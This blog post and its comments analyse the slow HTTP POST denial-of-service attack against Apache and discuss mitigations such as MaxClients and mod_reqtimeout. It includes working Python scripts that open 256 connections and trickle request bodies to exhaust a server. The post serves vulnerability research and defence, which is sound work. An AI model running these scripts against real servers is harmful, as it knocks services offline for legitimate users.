HTTP Post Denial Of Service: more dangerous than initially thought

Wong Onn Chee and Tom Brennan from OWASP recently published a paper* presenting a new denial of service attack against web servers.

What’s special about this denial of service attack is that it’s very hard to fix, because it relies on a generic problem in the way the HTTP protocol works. Properly fixing it would mean breaking the protocol, and that’s certainly not desirable. The authors list some possible workarounds, but in my opinion none of them really fixes the problem.

The attack explained

An attacker establishes a number of connections with the web server. On each of these connections he sends a request with a Content-Length header announcing a large body (e.g. Content-Length: 10000000), so the web server will expect 10000000 bytes on each connection. The trick is not to send all this data at once but to send it character by character over a long period of time (e.g. 1 character every 10-100 seconds). The web server will keep these connections open for a very long time, until it receives all the data. During this time, other clients will have a hard time connecting to the server, or, even worse, will not be able to connect at all, because all the available connections are busy.
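To make the mechanics concrete, here is a minimal sketch of a single such connection in Python (victim.example.com and the request path are placeholders; a real attack opens many of these in parallel):

import socket
import time

# Send the request line and headers, announcing a 10000000-byte body.
sock = socket.create_connection(("victim.example.com", 80))
sock.sendall(
    b"POST /form HTTP/1.1\r\n"
    b"Host: victim.example.com\r\n"
    b"Content-Length: 10000000\r\n"
    b"\r\n"
)

# The server now waits for the full body. Trickle it out one character
# at a time so the connection stays occupied indefinitely.
while True:
    sock.sendall(b"a")
    time.sleep(10)  # 1 character every 10-100 seconds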

In this blog post, I would like to expand on the effect of this denial of service attack against Apache.

First, I would like to start with one of their claims:

“Hence, any website which has forms, i.e.
accepts HTTP POST requests, is susceptible to
such attacks.”

At least in the case of Apache, this is not correct. It doesn’t matter if the website has forms or not: any Apache web server is vulnerable to this attack. The web server doesn’t decide whether the resource can accept POST data until it has received the full request.

I’ve created a very simple Acunetix WVS test script to reproduce this attack and prove this point: the script creates 256 sockets, establishes a TCP connection to the web server on each socket and starts sending data slowly (1 character per second).
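The WVS script itself is not reproduced here, but a rough Python equivalent of what it does might look like this (HOST and PORT are placeholders for the test server):

import socket
import time

HOST, PORT = "192.168.0.10", 80  # test server (placeholder)
CONNECTIONS = 256                # Apache's default MaxClients

request_head = (
    "POST /aaaaaaaaaaaa HTTP/1.1\r\n"
    "Host: " + HOST + "\r\n"
    "Content-Length: 10000000\r\n"
    "\r\n"
).encode()

# Open all connections and send the headers on each one.
sockets = []
for _ in range(CONNECTIONS):
    sock = socket.create_connection((HOST, PORT))
    sock.sendall(request_head)
    sockets.append(sock)

# Keep every connection busy: one body character per socket per second.
while True:
    for sock in sockets:
        sock.sendall(b"a")
    time.sleep(1)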

Note that the script makes its HTTP POST requests to a nonexistent file (POST /aaaaaaaaaaaa HTTP/1.1). After a few seconds, the web server becomes completely unresponsive. As soon as I stop the script, the web server starts responding again.

Therefore, any Apache web server is vulnerable to this attack.

How many connections are required until the web server stops responding?

Their paper mentions 20,000 connections as an example. They also make the following note:

Apache requires lesser number of connections
due to mandatory client or thread limit in
httpd.conf.

Interesting. How many fewer connections? If we look at the Apache 1.3 documentation, we find the following information:

The MaxClients directive sets the limit on the number of simultaneous requests that can be supported; not more than this number of child server processes will be created.

Syntax: MaxClients number
Default: MaxClients 256

Therefore, by default, Apache 1.3 allows only 256 simultaneous connections, and an attacker needs to tie up only 256 connections before the web server stops responding. The situation is the same with Apache 2.0.
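For reference, this limit lives in httpd.conf; a typical Apache 2.x prefork configuration (the values shown are the defaults) looks something like the following. Raising MaxClients only raises the bar for the attacker; it does not remove the attack.

<IfModule mpm_prefork_module>
    # One child process per connection; once all 256 children are
    # occupied by slow POST requests, no further clients are served.
    ServerLimit  256
    MaxClients   256
</IfModule>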

During my tests, I noticed the following error message in the Apache error log:

$ tail -f /var/log/apache2/error.log

[Mon Nov 22 15:23:17 2010] [notice] Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g configured -- resuming normal operations
[Mon Nov 22 15:24:46 2010] [error] server reached MaxClients setting, consider raising the MaxClients setting

In conclusion, this denial of service attack affects any Apache web server, and only a few hundred connections are required to make the server completely unresponsive. And to my knowledge, there is no proper fix for it:

Apache’s response was:

“What you described is a known attribute (read: flaw) of the
HTTP protocol over TCP/IP. The Apache HTTP project declines to treat this
expected use-case as a vulnerability in the software.”

And Microsoft’s response:

“While we recognize this is an issue, this issue does not meet our
bar for the release of a security update. We will continue to track this issue
and the changes I mentioned above for release in a future service pack.”

That’s pretty scary!

* The paper published by Wong Onn Chee and Tom Brennan can be found here.

Comments
  • “At least in the case of Apache, this is not correct. It doesn’t matter if the website has forms or not.
    Any Apache web server is vulnerable to this attack.”

    This isn’t necessarily true. If you’re using Apache to just serve static files, Apache won’t accept POST requests to URLs that map to those files; it’ll return error 405: Method Not Allowed.

    Of course, you’re right that if you’re serving any kind of dynamic content, like, say, a PHP file, Apache will happily accept any POST request.

    • @Mike As you can see in the source code, I’m posting to a nonexistent file (POST /aaaaaaaaaaaa) – not to a PHP file. How do you configure Apache to just serve static files? I’ve commented out “AddType application/x-httpd-php .php .phtml .php3” and “LoadModule php5_module /usr/lib/apache2/modules/libphp5.so” and the attack still works as usual.

  • You obviously have not looked over mod_reqtimeout, which has been available since 2.2.15, I think. If you are still using 1.3 after 12 and a half years, maybe it is time to “get with the times”? If you are using the new 2.0.64, it may be the last release for 2.0 as well, so again, maybe it is time to “get with the times”?

    mod_reqtimeout may not be the answer, but looking at what you’ve discussed here, it should do the trick.

    Obviously the attacker can tune the timing, but at a certain point it becomes moot, since the attacker would have to send enough data, fast enough, to satisfy the limits.

    I may be wrong, but that is how I see it.

    • @Gregg I’m not using Apache 1.3. The Apache 1.3 documentation just happened to be the first hit when looking on Google for MaxClients. But, yes, I hadn’t checked mod_reqtimeout. Thanks, I will check it out (a sample configuration is sketched below).
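      For reference, a minimal mod_reqtimeout configuration (assuming Apache 2.2.15 or later, with the module loaded; the values are only illustrative) would look something like this:

      # Abort the request if the headers take longer than 20-40 seconds
      # to arrive, or if the body arrives slower than 500 bytes/second.
      RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500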

  • How is this in any way a new attack? The DoS vectors for HTTP are all well-known, and you can perform the exact same attack using character-by-character GET requests to overload the servers. Sure, the payload is smaller, but you can magnify it with concurrency.

  • I don’t think it requires changing the standard; can’t a web server just close the connection and return an error under one of these conditions (a rough sketch follows below)?
    a) Content length too large (say, 20 MB; could be tunable depending on the context)
    b) Upload speed too slow (say, less than 1 KB/s)
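    A rough sketch of this idea in Python, for a hand-rolled server (the limits and the read_body helper are hypothetical, not part of any real server):

    import time

    MAX_CONTENT_LENGTH = 20 * 1024 * 1024  # (a) 20 MB cap, tunable
    MIN_RATE = 1024                        # (b) 1 KB/s minimum upload speed

    def read_body(conn, content_length):
        # Reject oversized bodies before reading anything.
        if content_length > MAX_CONTENT_LENGTH:
            raise ValueError("413 Request Entity Too Large")
        conn.settimeout(30)  # recv() must not block forever on a silent peer
        body, start = b"", time.time()
        while len(body) < content_length:
            chunk = conn.recv(4096)
            if not chunk:
                raise ValueError("400 Bad Request: client closed early")
            body += chunk
            elapsed = time.time() - start
            # Enforce the minimum upload rate after a short grace period.
            if elapsed > 5 and len(body) / elapsed < MIN_RATE:
                raise ValueError("408 Request Timeout: upload too slow")
        return body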

  • Interesting to note that this is only a DoS attack for threaded servers – async web servers such as nginx and lighttpd avoid this altogether (or at least have a much higher failure threshold), as the overhead of a long-lived connection is minimal.

  • @Chris: with IPv6, it won’t be unheard of for a user to have access to 64 bits (or more!) of IP space. A well-crafted script running over IPv6 could easily create a single IP per socket to use.

  • Thanks a lot, author. It is really a big flaw if there’s no proper fix for it. I want to create a PHP script to test it.
